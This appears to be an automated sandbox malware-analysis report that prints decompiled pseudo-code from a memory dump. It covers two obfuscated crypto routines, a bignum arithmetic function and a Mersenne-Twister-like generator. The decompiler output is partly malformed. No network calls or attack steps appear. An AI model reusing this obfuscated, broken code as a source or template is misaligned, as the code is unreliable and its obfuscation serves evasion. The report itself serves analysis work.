Opcode ID: 2a38a42524a85d8a6896d50e097e472ab384559ca5a313bed28f7fe9541f46d5
Instruction ID: dde7354e63cbc4fa2933941559a81b15e6dd4fed54dfb6be4d3e03868038369f
Opcode Fuzzy Hash: 2a38a42524a85d8a6896d50e097e472ab384559ca5a313bed28f7fe9541f46d5
Instruction Fuzzy Hash: 9BE092236039386B52108AAFADC4C97FF9CEE421AA3031227FA5CD36A0D1504C088AF5

Uniqueness

Uniqueness Score: -1.00%

Function 0085DA70, Relevance: .7, Instructions: 746
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0085DA70(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, signed int* _a12, void* _a16) {
				unsigned int _v20;
				signed int _v24;
				signed int* _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				void* _t304;
				signed int _t305;
				signed int _t309;
				void* _t311;
				signed int _t314;
				signed int _t317;
				signed int* _t319;
				signed int _t328;
				signed int _t329;
				void* _t331;
				void* _t336;
				void* _t338;
				void* _t344;
				intOrPtr _t347;
				void* _t355;
				signed int _t358;
				void* _t360;
				signed int _t366;
				signed int _t368;
				void* _t369;
				signed int _t376;
				signed int* _t377;
				signed int _t379;
				signed int _t380;
				void* _t383;
				signed int _t387;
				void* _t396;
				void* _t401;
				signed int _t408;
				void* _t409;
				void* _t410;
				void* _t412;
				intOrPtr _t414;
				void* _t415;
				signed int _t418;
				signed int _t421;
				void* _t425;
				void* _t426;
				signed char _t427;
				signed int _t432;
				intOrPtr _t434;
				signed char _t444;
				signed int _t445;
				intOrPtr _t450;
				signed int _t457;
				signed int _t459;
				signed int _t460;
				signed int* _t461;
				signed int* _t463;
				signed int _t464;
				signed int _t465;
				signed int* _t466;
				signed int _t471;
				signed int _t472;
				intOrPtr* _t475;
				signed int* _t476;
				signed int _t478;
				signed int _t479;
				signed int _t481;
				signed int* _t484;
				unsigned int _t486;
				unsigned int _t490;
				signed int _t491;
				intOrPtr _t492;
				signed int _t495;
				signed int _t498;
				signed int _t502;
				signed int _t503;
				signed int _t506;
				signed char _t507;
				intOrPtr* _t510;
				signed int _t525;
				signed int _t527;
				signed int _t532;
				signed int _t533;
				signed int _t542;
				signed int _t543;
				intOrPtr _t549;
				intOrPtr* _t551;
				signed int _t552;
				void* _t566;
				signed int _t569;
				signed int _t570;
				signed int* _t576;
				signed int _t581;
				signed int _t582;
				signed int* _t584;
				signed int _t586;
				signed int _t590;
				signed int _t592;
				signed int _t595;
				signed int _t599;
				void* _t600;
				void* _t602;
				void* _t604;
				void* _t606;
				void* _t621;
				void* _t629;
				void* _t632;
				void* _t633;
				void* _t634;
				void* _t635;

				_t532 = __edx;
				_t455 = _a12;
				_t584 = E0085EC10();
				_v28 = E0085EC10();
				_t549 = E0085EC10();
				_v68 = E0085EC10();
				_v40 = E0085EC10();
				_v80 = E0085EC10();
				_t304 = E0085E3C0(__ecx, __eflags, _a12, _a16);
				_t602 = _t600 - 0x70 + 8;
				if(_t304 == 0) {
					_t305 = E0085EBE0(_t455);
					_t602 = _t602 + 4;
					__eflags = _t305;
					if(_t305 == 0) {
						_v64 = _t549;
						_v52 = _t584;
						_t457 =  *_a16;
						__eflags = _t457 - 1;
						if(__eflags != 0) {
							_v24 =  *_a12;
							_t490 = E00841460(__eflags,  *_a12 - 0x1a86f375, 0x1a86f376);
							_t309 = _a4;
							_v44 = _t457;
							_v20 = _t490;
							_t56 = _t490 + 0x3df43c37; // 0x3df43c37
							_t311 = E008422E0(__eflags, _t56, _t457);
							_t604 = _t602 + 0x10;
							_t459 = _t311 + 0xc20bc3c9;
							__eflags =  *((intOrPtr*)(_t309 + 4)) - _t459;
							if( *((intOrPtr*)(_t309 + 4)) < _t459) {
								_t432 = _a4;
								_t581 = _t432;
								 *(_t432 + 4) = _t459;
								_t434 = E00843F90( *((intOrPtr*)(_t581 + 8)), _t459 * 4);
								_t604 = _t604 + 8;
								 *((intOrPtr*)(_t581 + 8)) = _t434;
							}
							_t551 = _v28;
							E00847D70(_a12, _t551);
							E00847D70(_a16, _t584);
							_t606 = _t604 + 0x10;
							_t314 =  *_t584;
							_t491 = _t584[2];
							_v32 = _t459;
							__eflags =  *(_t491 + _t314 * 4 - 4);
							if( *(_t491 + _t314 * 4 - 4) < 0) {
								_v56 = 0;
								_t460 = 1;
								goto L25;
							} else {
								_t525 = 0;
								__eflags = 0;
								_t481 = 1;
								do {
									_v56 = (_t525 << 0x00000020 | _t481) << 1;
									_v60 = _t481 + _t481;
									E0085E320(_t584, 0x862028);
									_t425 = E00841460(__eflags, E00849D50(0xfa78285f) +  *_t584, 0xffffffff);
									_t426 = E00849D50(0xfa78285f);
									_t481 = _v60;
									_t427 = E00846BB0(__eflags,  *((intOrPtr*)(_t584[2] + (_t425 - _t426) * 4)), 0xffffffff);
									_t525 = _v56;
									_t606 = _t606 + 0x20;
									__eflags = _t427 & 0x00000001;
								} while ((_t427 & 0x00000001) != 0);
								__eflags = _t481 | _t525;
								if((_t481 | _t525) == 0) {
									_t551 = _v28;
									_t460 = 0;
									__eflags = 0;
									_v56 = 0;
								} else {
									E0085E610(_v64, _t481);
									_t551 = _v28;
									E0085E320(_t551, _v64);
									_t606 = _t606 + 0x10;
								}
								L25:
								_t492 =  *_t551;
								__eflags = _t492 - _v20;
								if(_t492 != _v20) {
									_t576 = _v28;
									_t418 = _t492 + 1;
									 *_t576 = _t418;
									__eflags = _t492 - _t576[1];
									if(_t492 >= _t576[1]) {
										_t576[1] = _t418;
										__eflags = _t418 << 2;
										_t421 = E00843F90(_t576[2], _t418 << 2);
										_t606 = _t606 + 8;
										_t576[2] = _t421;
									}
									 *((intOrPtr*)(_t576[2] + _v24 * 4)) = 0;
								}
								_v60 = _t460;
								_t461 = _v28;
								__eflags = _v32;
								if(__eflags <= 0) {
									L53:
									_t317 = _a4;
									_t533 = _t317;
									_t495 =  *_a12 -  *_a16;
									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 8)) + _t495 * 4)) - 1;
									asm("sbb ecx, 0xffffffff");
									 *_t533 = _t495;
									_t586 =  *_t461;
									__eflags = _t586;
									if(_t586 <= 0) {
										__eflags = 0;
										L58:
										_t319 = _v28;
										 *_t319 = 0;
										_t463 = _t319;
										E00847D70(_t319, _a8);
										_t584 = _v52;
										_t549 = _v64;
										L6:
										_push(_t549);
										E0085EBC0();
										_push(_v68);
										E0085EBC0();
										_push(_v40);
										E0085EBC0();
										_push(_t463);
										E0085EBC0();
										_push(_t584);
										E0085EBC0();
										_push(_v80);
										return E0085EBC0();
									}
									_t464 = 0;
									_v24 = _t461[2];
									_t328 = 0;
									__eflags = 0;
									do {
										_t552 = _v24;
										_v32 =  *(_t552 + _t586 * 4 - 4);
										_t329 = E00853860( *(_t552 + _t586 * 4 - 4), _t328, _v60, _v56);
										__eflags = _t329;
										 *(_t552 + _t586 * 4 - 4) = _t329;
										_t535 =  !=  ? _t586 : _t464;
										__eflags = _t464;
										_t464 =  ==  ?  !=  ? _t586 : _t464 : _t464;
										_t498 = _t533 * _v60;
										_t533 = (_t329 * _v60 >> 0x20) + _t329 * _v56;
										_t331 = E00841A50(0, 0, _t329 * _v60, _t498 + _t533);
										_t606 = _t606 + 0x10;
										_t328 = _t331 + _v32;
										_t586 = _t586 - 1;
										__eflags = _t586;
									} while (_t586 > 0);
									goto L58;
								} else {
									_t465 = _v44;
									_v112 = E00841460(__eflags, _t465, 0xffffffff);
									_v96 = _t465 + 1;
									_v92 = 4 + _t465 * 4;
									_t336 = E00841460(__eflags, _v24, 0xa8f61def);
									_v20 = _v24 + 1;
									_t338 = E008422E0(__eflags, _v24 + 0x9ecacfc6, _t465);
									_v104 = E00849D50(0x5413097) + _t338;
									E008422E0(__eflags, _v20, _t465);
									_t344 = E008422E0(__eflags, E00841460(__eflags, _t465, 0xbfefafd5) + 1, 0xbfefafd5);
									E00841460(__eflags, _t465, 1);
									_t621 = _t606 + 0x3c;
									_t466 = _v28;
									_v100 = _t465 + 0x18a13f73;
									_t347 = 0;
									_v88 = _t344 + 0x3baa12e3;
									_v108 = _t336 - _t465 + 0x5709e211;
									_t590 = _v32;
									do {
										_v120 = _t347;
										_v116 = _v108 - _t347;
										E00841460(__eflags, _t590, 0xffffffff);
										_v84 = _t590;
										_v36 =  *((intOrPtr*)(_t466 + 8));
										_v76 = E008422E0(__eflags, _v100 + _t590, 0x18a13f74);
										_v32 = _t590 - 1;
										E00841460(__eflags, _t590 - 1, _v44);
										_t355 = E008413C0(E008422E0(__eflags, 0, 0xffffffff), 0,  *((intOrPtr*)(_v36 + _t352 * 4)),  *((intOrPtr*)(_v36 + (_t352 - _t354) * 4)), 0);
										_t502 = _v52[2];
										_t592 =  *(_t502 + _v112 * 4);
										_v72 = _t502;
										_t358 = E00853860(_t355, _t532, _t592, 0);
										__eflags = _t358 - 0xffffffff;
										_t503 = _t532;
										_v124 = _t592;
										asm("sbb edx, 0x0");
										_t538 =  <  ? _t503 : 0;
										_v20 =  <  ? _t503 : 0;
										_t540 =  <  ? _t358 : 0xffffffff;
										_v24 =  <  ? _t358 : 0xffffffff;
										_t542 = (_t358 * _t592 >> 0x20) + _t503 * _t592;
										asm("adc ebx, 0x2892411f");
										_t360 = E00841A50(_t355 + 0xd2627799, _t532, _t358 * _t592, _t542);
										_t471 = _t360 - E00842070(0xb6167735, 0xa7951915);
										asm("sbb esi, edx");
										_v48 = _t542;
										_v72 =  *((intOrPtr*)(_v72 + _v44 * 4 - 8));
										__eflags = _v76 + 0x6e556da6;
										_t366 = E00841460(_v76 + 0x6e556da6, _v76 + 0x6e556da6, 0xfffffffe);
										_t506 = _v20;
										_t629 = _t621 + 0x50;
										_t543 = _v36;
										_v128 =  *((intOrPtr*)(_t543 + 0x46aa4968 + _t366 * 4));
										_t368 = _v24;
										while(1) {
											_v20 = _t506;
											_v24 = _t368;
											_t369 = E00843A30(_t368, _t506, _v72, 0);
											_v36 = _t543;
											_t507 = E00842070(0x6474008c, 0x8f07580a);
											_v76 = _t471;
											_t472 = _t471 << _t507;
											__eflags = _t507 & 0x00000020;
											_t566 =  !=  ? _t472 : (_v48 << 0x00000020 | _t471) << _t507;
											_t473 =  !=  ? 0 : _t472;
											_t474 = ( !=  ? 0 : _t472) | _v128;
											_t376 = E00842070(0x6474008c, 0x8f07580a);
											_t632 = _t629 + 0x20;
											__eflags = (( !=  ? 0 : _t472) | _v128) - _t369;
											asm("sbb edi, [ebp-0x20]");
											if((( !=  ? 0 : _t472) | _v128) >= _t369) {
												break;
											}
											_t415 = E00842070(0x393c8f08, 0xec16389c);
											_t569 = _t543;
											asm("adc edi, ecx");
											_t595 = _t415 + _v24 + 0xa2b7705b;
											asm("adc edi, 0x9cee9f69");
											E00841750(__eflags, _v24, _v20, 0xffffffff, 0xffffffff);
											_t629 = _t632 + 0x18;
											_t368 = _t595;
											_t506 = _t569;
											_t471 = _v76 + _v124;
											__eflags = _t471;
											asm("adc dword [ebp-0x2c], 0x0");
											if(_t471 == 0) {
												continue;
											}
											L37:
											_t509 = _v80;
											_t475 = _v40;
											__eflags = _t569 - 1;
											asm("sbb edx, 0x0");
											_t377 =  *(_t509 + 8);
											 *_t377 = _t595;
											_t377[1] = _t569;
											 *_t509 = 2;
											E0085E690(_t569 - 1, _v68, _v52, _t509);
											_t633 = _t632 + 0xc;
											_t379 = _v44;
											__eflags = _t379 -  *((intOrPtr*)(_t475 + 4));
											if(_t379 >=  *((intOrPtr*)(_t475 + 4))) {
												 *((intOrPtr*)(_t475 + 4)) = _v96;
												_t414 = E00843F90( *((intOrPtr*)(_t475 + 8)), _v92);
												_t633 = _t633 + 8;
												 *((intOrPtr*)(_t475 + 8)) = _t414;
												_t379 = _v44;
											}
											__eflags = _t379;
											 *_t475 = 0;
											if(__eflags < 0) {
												L44:
												_t476 = _v40;
												_t380 = E0085E3C0(_t509, __eflags, _t476, _v68);
												_t634 = _t633 + 8;
												__eflags = _t380;
												if(_t380 != 0) {
													E0085E380(_t476, _v52);
													_t401 = E00849D50(0x11f2bfb2);
													_t634 = _t634 + 0xc;
													_t595 = _t595 + _t401 - 0x7586bf1f;
												}
												E0085E650(_t476, _v68);
												_t635 = _t634 + 8;
												_t570 =  *_t476;
												__eflags = _t570;
												if(_t570 > 0) {
													_t478 = 0;
													__eflags = 1;
													_v36 = 1 - _v84;
													_v20 = _v40[2];
													_v48 = _v28[2];
													0;
													0;
													do {
														_v24 =  *((intOrPtr*)(_v20 + _t478 * 4));
														_t396 = E008422E0(__eflags, 0, _t478);
														E00841460(__eflags, _t478, _v32);
														_t635 = _t635 + 0x10;
														_t478 = _t478 + 1;
														 *((intOrPtr*)(_v48 - (_t396 + _v36 << 2))) = _v24;
														_t570 =  *_v40;
														__eflags = _t478 - _t570;
													} while (__eflags < 0);
												}
												goto L49;
											} else {
												_t479 = 0;
												_v24 = _v28[2];
												_v20 = _v40[2];
												do {
													_t509 = _v24;
													_t408 =  *(_v24 + (_v32 + _t479) * 4);
													__eflags = _t408;
													 *(_v20 + _t479 * 4) = _t408;
													if(__eflags != 0) {
														_t412 = E008422E0(__eflags, 0, _t479);
														_t633 = _t633 + 8;
														_t509 = 1 - _t412;
														 *_v40 = 1 - _t412;
													}
													_t409 = E008422E0(__eflags, _t479, 0x19c77e59);
													_t410 = E00849D50(0x7db37ef5);
													E00841460(__eflags, _t479, 1);
													_t633 = _t633 + 0x14;
													__eflags = _t479 - _v44;
													_t479 = _t409 + _t410 + 1;
												} while (__eflags != 0);
												goto L44;
											}
										}
										_t595 = _v24;
										__eflags = _t376 & 0x00000020;
										_t569 =  ==  ? (_v20 << 0x00000020 | _t595) >> _t376 : _v20 >> _t376;
										goto L37;
										L49:
										__eflags = _t570 - _v44;
										if(_t570 <= _v44) {
											_t387 = E00841460(__eflags, _t570 - E00849D50(0x1f4aa581), _v116);
											__eflags = _v88 - _t570;
											E00853580(_v28[2] + _t387 * 4 - 0x13056b4c, 0, 0x1157b474 + (_v88 - _t570) * 4);
											_t635 = _t635 + 0x18;
										}
										_t510 = _a4;
										_t532 = _v84;
										__eflags = _t595;
										_t461 = _v28;
										 *( *((intOrPtr*)(_t510 + 8)) + _t532 * 4 - 4) = _t595;
										_t590 = _v32;
										if(_t595 != 0) {
											 *_t510 = _t590;
										}
										_t383 = E00849D50(0xf239476a);
										_t606 = _t635 + 4;
										_t347 = _v120 - _t383 + 0x964d47c7;
										__eflags = _t347 - _v104;
									} while (__eflags != 0);
									goto L53;
								}
							}
						}
						_t484 = _a12;
						_t527 = _a4;
						_t582 =  *_t484;
						__eflags =  *(_t527 + 4) - _t582;
						if( *(_t527 + 4) < _t582) {
							 *(_t527 + 4) = _t582;
							__eflags = _t582 << E00849D50(0x647400ae);
							_t450 = E00843F90( *((intOrPtr*)(_a4 + 8)), _t582 << E00849D50(0x647400ae));
							_t527 = _a4;
							_t602 = _t602 + 0xc;
							 *((intOrPtr*)(_t527 + 8)) = _t450;
							_t582 =  *_t484;
						}
						__eflags = _t582;
						if(_t582 <= 0) {
							__eflags = 0;
							goto L22;
						} else {
							_t486 = 0;
							_t599 = 0;
							__eflags = 0;
							_v48 = _t484[2];
							_v36 =  *((intOrPtr*)(_t527 + 8));
							_v32 =  *((intOrPtr*)(_a16 + 8));
							0;
							0;
							do {
								_v20 = _t486;
								_v24 =  *((intOrPtr*)(_v48 + _t582 * 4 - 4));
								 *((intOrPtr*)(_v36 + _t582 * 4 - 4)) = E00853860( *((intOrPtr*)(_v48 + _t582 * 4 - 4)), _t599,  *_v32, 0);
								_t444 = E00845920(_v36, _t443, 0);
								_t602 = _t602 + 8;
								__eflags = _t444 & 0x00000001;
								_t445 = _v20;
								_t487 =  !=  ? _t582 : _t486;
								__eflags = _t445;
								_t486 =  !=  ? _t445 :  !=  ? _t582 : _t486;
								_t599 = E00852E20(_v24, _t599,  *_v32, 0);
								_t582 = _t582 - 1;
								__eflags = _t582;
							} while (_t582 > 0);
							L22:
							_t549 = _v64;
							E0085E610(_a8, 0);
							_t584 = _v52;
							 *_a4 = 0;
							L5:
							_t463 = _v28;
							goto L6;
						}
					}
					 *_a4 = 0;
					E0085E610(_a8, 0);
					L4:
					goto L5;
				}
				 *_a4 = 0;
				E00847D70(_t455, _a8);
				goto L4;
			}

0x0085da70
0x0085da79
0x0085da81
0x0085da88
0x0085da90
0x0085da97
0x0085da9f
0x0085daa7
0x0085daae
0x0085dab3
0x0085dab8
0x0085dacf
0x0085dad4
0x0085dad7
0x0085dad9
0x0085db38
0x0085db3b
0x0085db3e
0x0085db40
0x0085db43
0x0085dc09
0x0085dc20
0x0085dc22
0x0085dc25
0x0085dc28
0x0085dc2e
0x0085dc36
0x0085dc3b
0x0085dc40
0x0085dc46
0x0085dc48
0x0085dc4a
0x0085dc4d
0x0085dc4f
0x0085dc5d
0x0085dc62
0x0085dc65
0x0085dc65
0x0085dc68
0x0085dc6f
0x0085dc7b
0x0085dc80
0x0085dc83
0x0085dc85
0x0085dc88
0x0085dc8b
0x0085dc90
0x0085dd44
0x0085dd4b
0x00000000
0x0085dc96
0x0085dc96
0x0085dc96
0x0085dc98
0x0085dca0
0x0085dca6
0x0085dca9
0x0085dcb2
0x0085dcd1
0x0085dce0
0x0085dcef
0x0085dcf2
0x0085dcf7
0x0085dcfa
0x0085dcfd
0x0085dcfd
0x0085dd03
0x0085dd05
0x0085dd52
0x0085dd55
0x0085dd55
0x0085dd57
0x0085dd07
0x0085dd0c
0x0085dd15
0x0085dd19
0x0085dd1e
0x0085dd1e
0x0085dd5e
0x0085dd61
0x0085dd63
0x0085dd65
0x0085dd67
0x0085dd6a
0x0085dd6d
0x0085dd6f
0x0085dd72
0x0085dd74
0x0085dd77
0x0085dd7e
0x0085dd83
0x0085dd86
0x0085dd86
0x0085dd8f
0x0085dd8f
0x0085dd99
0x0085dd9c
0x0085dd9f
0x0085dda1
0x0085e285
0x0085e288
0x0085e290
0x0085e295
0x0085e297
0x0085e29b
0x0085e29e
0x0085e2a0
0x0085e2a2
0x0085e2a4
0x0085e300
0x0085e302
0x0085e302
0x0085e305
0x0085e307
0x0085e30d
0x0085e315
0x0085e318
0x0085daf4
0x0085daf4
0x0085daf5
0x0085dafd
0x0085db00
0x0085db08
0x0085db0b
0x0085db13
0x0085db14
0x0085db1c
0x0085db1d
0x0085db25
0x0085db34
0x0085db34
0x0085e2a9
0x0085e2ab
0x0085e2ae
0x0085e2ae
0x0085e2b0
0x0085e2b0
0x0085e2b7
0x0085e2c2
0x0085e2c9
0x0085e2cd
0x0085e2d3
0x0085e2d6
0x0085e2d8
0x0085e2e2
0x0085e2e6
0x0085e2f0
0x0085e2f5
0x0085e2f8
0x0085e2fb
0x0085e2fb
0x0085e2fb
0x00000000
0x0085dda7
0x0085dda9
0x0085ddb5
0x0085ddbb
0x0085ddc5
0x0085ddd3
0x0085dde6
0x0085ddeb
0x0085de04
0x0085de0b
0x0085de28
0x0085de35
0x0085de3a
0x0085de45
0x0085de54
0x0085de57
0x0085de59
0x0085de5c
0x0085de5f
0x0085de92
0x0085de95
0x0085de9d
0x0085dea3
0x0085deae
0x0085deb1
0x0085dec9
0x0085decf
0x0085ded3
0x0085def7
0x0085df06
0x0085df0c
0x0085df0f
0x0085df17
0x0085df1c
0x0085df1f
0x0085df21
0x0085df24
0x0085df2c
0x0085df2f
0x0085df37
0x0085df3d
0x0085df42
0x0085df4a
0x0085df54
0x0085df72
0x0085df7a
0x0085df7c
0x0085df83
0x0085df89
0x0085df91
0x0085df96
0x0085df99
0x0085df9c
0x0085dfa6
0x0085dfa9
0x0085dfb0
0x0085dfb5
0x0085dfb9
0x0085dfbd
0x0085dfcc
0x0085dfe1
0x0085dfe3
0x0085dfee
0x0085dff0
0x0085dff3
0x0085dff6
0x0085dffe
0x0085e008
0x0085e00d
0x0085e010
0x0085e012
0x0085e015
0x00000000
0x00000000
0x0085e021
0x0085e031
0x0085e035
0x0085e037
0x0085e03d
0x0085e049
0x0085e04e
0x0085e054
0x0085e056
0x0085e058
0x0085e058
0x0085e05b
0x0085e05f
0x00000000
0x00000000
0x0085e084
0x0085e084
0x0085e087
0x0085e08a
0x0085e092
0x0085e095
0x0085e098
0x0085e09a
0x0085e09d
0x0085e0a6
0x0085e0ab
0x0085e0ae
0x0085e0b1
0x0085e0b4
0x0085e0b9
0x0085e0c2
0x0085e0c7
0x0085e0ca
0x0085e0cd
0x0085e0cd
0x0085e0d0
0x0085e0d2
0x0085e0d8
0x0085e170
0x0085e173
0x0085e177
0x0085e17c
0x0085e17f
0x0085e181
0x0085e187
0x0085e194
0x0085e199
0x0085e19c
0x0085e19c
0x0085e1a7
0x0085e1ac
0x0085e1af
0x0085e1b1
0x0085e1b3
0x0085e1bd
0x0085e1bf
0x0085e1c5
0x0085e1c8
0x0085e1d1
0x0085e1da
0x0085e1de
0x0085e1e0
0x0085e1e6
0x0085e1ec
0x0085e1fd
0x0085e202
0x0085e20e
0x0085e211
0x0085e216
0x0085e218
0x0085e218
0x0085e1e0
0x00000000
0x0085e0de
0x0085e0e1
0x0085e0e6
0x0085e0ef
0x0085e133
0x0085e136
0x0085e13e
0x0085e141
0x0085e143
0x0085e146
0x0085e14b
0x0085e150
0x0085e15b
0x0085e15d
0x0085e15d
0x0085e106
0x0085e115
0x0085e124
0x0085e129
0x0085e12c
0x0085e12f
0x0085e12f
0x00000000
0x0085e133
0x0085e0d8
0x0085e070
0x0085e07f
0x0085e081
0x00000000
0x0085e21c
0x0085e21c
0x0085e21f
0x0085e23c
0x0085e24e
0x0085e25b
0x0085e260
0x0085e260
0x0085e263
0x0085e266
0x0085e269
0x0085e26b
0x0085e271
0x0085e275
0x0085e278
0x0085e27e
0x0085e27e
0x0085de75
0x0085de7a
0x0085de84
0x0085de89
0x0085de89
0x00000000
0x0085de92
0x0085dda1
0x0085dc90
0x0085db49
0x0085db4c
0x0085db4f
0x0085db51
0x0085db54
0x0085db56
0x0085db68
0x0085db71
0x0085db76
0x0085db79
0x0085db7c
0x0085db7f
0x0085db7f
0x0085db81
0x0085db83
0x0085dd25
0x00000000
0x0085db89
0x0085db8f
0x0085db91
0x0085db91
0x0085db93
0x0085db99
0x0085db9f
0x0085dba8
0x0085dbac
0x0085dbb0
0x0085dbb3
0x0085dbba
0x0085dbce
0x0085dbd5
0x0085dbda
0x0085dbdd
0x0085dbdf
0x0085dbe2
0x0085dbe5
0x0085dbe7
0x0085dbfa
0x0085dbfc
0x0085dbfc
0x0085dbfc
0x0085dd27
0x0085dd27
0x0085dd2f
0x0085dd3a
0x0085dd3d
0x0085daf1
0x0085daf1
0x00000000
0x0085daf1
0x0085db83
0x0085dade
0x0085dae9
0x0085daee
0x00000000
0x0085daee
0x0085dabd
0x0085dac7
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2156141244.0000000000841000.00000020.00020000.sdmp, Offset: 00840000, based on PE: true

Associated: 00000004.00000002.2156136083.0000000000840000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156155061.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156159856.0000000000862000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156165848.0000000000865000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e0f711492bb36744e6c962c0750c76b8387c85c21ffff2cd689d158c029460
Instruction ID: 10156c74a8510e442625e9eb4d2bd9baf77299b28ed01fc40e2d02e00c5a78af
Opcode Fuzzy Hash: e1e0f711492bb36744e6c962c0750c76b8387c85c21ffff2cd689d158c029460
Instruction Fuzzy Hash: 524272B5D002099FCB14DFA8DC81AAEBBB5FF48315F144528F819E7352E631AD15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00855BF0, Relevance: .3, Instructions: 307
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00855BF0(void* __eflags) {
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				void* _t48;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t57;
				void* _t60;
				unsigned int _t64;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t86;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				void* _t103;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t111;
				signed int _t120;
				signed int _t121;
				signed int _t128;
				signed int _t131;
				signed int _t169;
				void* _t179;
				signed int _t183;
				signed int _t188;
				signed int _t194;
				void* _t195;
				void* _t196;
				signed int _t237;

				_t169 =  *0x864194; // 0x1
				_t48 = E00849D50(0x647402c3);
				_t196 = _t195 + 4;
				_t234 = _t169 - _t48;
				if(_t169 > _t48) {
					_t179 = 0xfffffc74;
					0;
					do {
						_v24 = E008420A0(_t234,  *(_t179 + 0x863b60), 0xffffffff);
						_t69 = E00849D50(0xe47400ac);
						_t71 = E008420A0(_t234, E00849D50(0x5c38c288), 0xffffffff);
						_t74 = E00843750(_t234,  !(E00842DC0(_t234, _v24,  !_t69)), _t71 | 0x384cc224);
						_t196 = _t196 + 0x28;
						 *(_t179 + 0x863b60) =  *(0x860434 + ( *(_t179 + 0x863b64) & 0x00000001) * 4) ^  *(_t179 + 0x864194) ^ ( *(_t179 + 0x863b64) & 0x7ffffffe | _t74) >> 0x00000001;
						_t179 = _t179 + 4;
						_t235 = _t179;
					} while (_t179 != 0);
					_t75 = 0xe3;
					_t120 = 0xe3;
					0;
					do {
						_v24 = _t75;
						_v20 = 0x8637d4[_t75];
						_t77 = E00849D50(0xe47400ac);
						_t78 = E00842DC0(_t235, 0xe98fe736, 0x167018c9);
						_t121 = _t120 - E00849D50(0xdd67dd4);
						_v36 = _t121 + 0x69a27d79;
						_v20 =  *((intOrPtr*)(_t121 * 4 - 0x58efd248));
						_t81 = E008420A0(_t235, 0x7ffffffe, 0xffffffff);
						E00843750(_t235, _v20, 0x7ffffffe);
						_v28 =  !(_t78 & _v20 & _t77);
						_t86 = E00849D50(0x58908707);
						_v28 = E00842DC0(_t235, E008420A0(_t235,  !_t81 & _v20 & 0xc31b7854 | _t86 &  !( !_t81 & _v20), _t78 & _v20 & _t77 & 0xc31b7854 | E00849D50(0x58908707) & _v28),  !_t81 & _v20 & _t78 & _v20 & _t77);
						E00842DC0(_t235,  !_t81 & _v20, _t78 & _v20 & _t77);
						E00849D50(0x9b8bffb1);
						_v28 = _v28 >> 1;
						_t128 =  *(0x863448 + _v24 * 4);
						_v32 = _t128;
						_t183 =  *(0x860434 + (_v20 & 0x00000001) * 4);
						_v20 = _t183;
						_t97 = E008420A0(_t235, 0xc62da7e4, 0xffffffff);
						_t98 = E00843750(_t235, _v32, _t97);
						_t120 = _v36;
						_t188 = (_t98 |  !_t128 & 0xc62da7e4) ^ (_t97 & _v20 |  !_t183 & 0xc62da7e4);
						E008420A0(_t235, _v20, _v32);
						_t100 = _v28;
						E008420A0(_t235, _t188, _t100);
						0x8637d4[_v24] = _t188 ^ _t100;
						_t103 = E00849D50(0x647402c3);
						_t196 = _t196 + 0x68;
						_t236 = _t120 - _t103;
						_t75 = _t120;
					} while (_t120 != _t103);
					_t104 = E00843750(_t236,  *0x864190, 0x80000000);
					_t131 =  *0x8637d4; // 0x1212d96f
					_t105 = E00849D50(0x1b8bff52);
					_v24 = _t131;
					_t106 = E008420A0(_t236, _t131, 0xffffffff);
					_t107 = E008420A0(_t236, 1, 0xffffffff);
					_t111 = E00843750(_t236,  !(_t107 | _t106), (E00849D50(0x72976c99) | 0x16e36c35) ^ 0xe91c93ca);
					E00843750(_t236, _v24, 1);
					_t196 = _t196 + 0x30;
					_t194 = (_t105 & _t131 | _t104) >> 0x00000001 ^  *0x863e04 ^  *(0x860434 + _t111 * 4);
					_t237 = _t194;
					 *0x864194 = 0;
					 *0x864190 = _t194;
				}
				_t49 =  *0x864194; // 0x1
				_t150 = 0x8637d4[_t49];
				_t47 = _t49 + 1; // 0x2
				 *0x864194 = _t47;
				_t50 = E008420A0(_t237, 0x8637d4[_t49], 0xffffffff);
				_t51 = E00849D50(0x209e1c2b);
				E008420A0(_t237, _t150 >> 0xb, _t150);
				_t57 = E008420A0(_t237, ((_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87) << 0x00000007 & 0x9d2c5680, (_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87);
				E00849D50(0x8bb200ac);
				_t60 = E00843750(_t237, E008420A0(_t237, _t57, 0xffffffff), 0x33945623);
				_t64 = E00842DC0(_t237, _t60, E00843750(_t237, _t57, 0xcc6ba9dc)) ^ _t57 << 0x0000000f & 0xefc60000 ^ 0x33945623;
				return E008420A0(_t237, _t64, 0xffffffff) & _t64 >> 0x00000012 |  !(_t64 >> 0x12) & _t64;
			}

0x00855bf9
0x00855c04
0x00855c09
0x00855c0c
0x00855c0e
0x00855c14
0x00855c1f
0x00855c20
0x00855c30
0x00855c38
0x00855c54
0x00855c74
0x00855c79
0x00855ca0
0x00855ca6
0x00855ca6
0x00855ca6
0x00855caf
0x00855cb4
0x00855cbc
0x00855cc0
0x00855cc0
0x00855cca
0x00855cd2
0x00855ce6
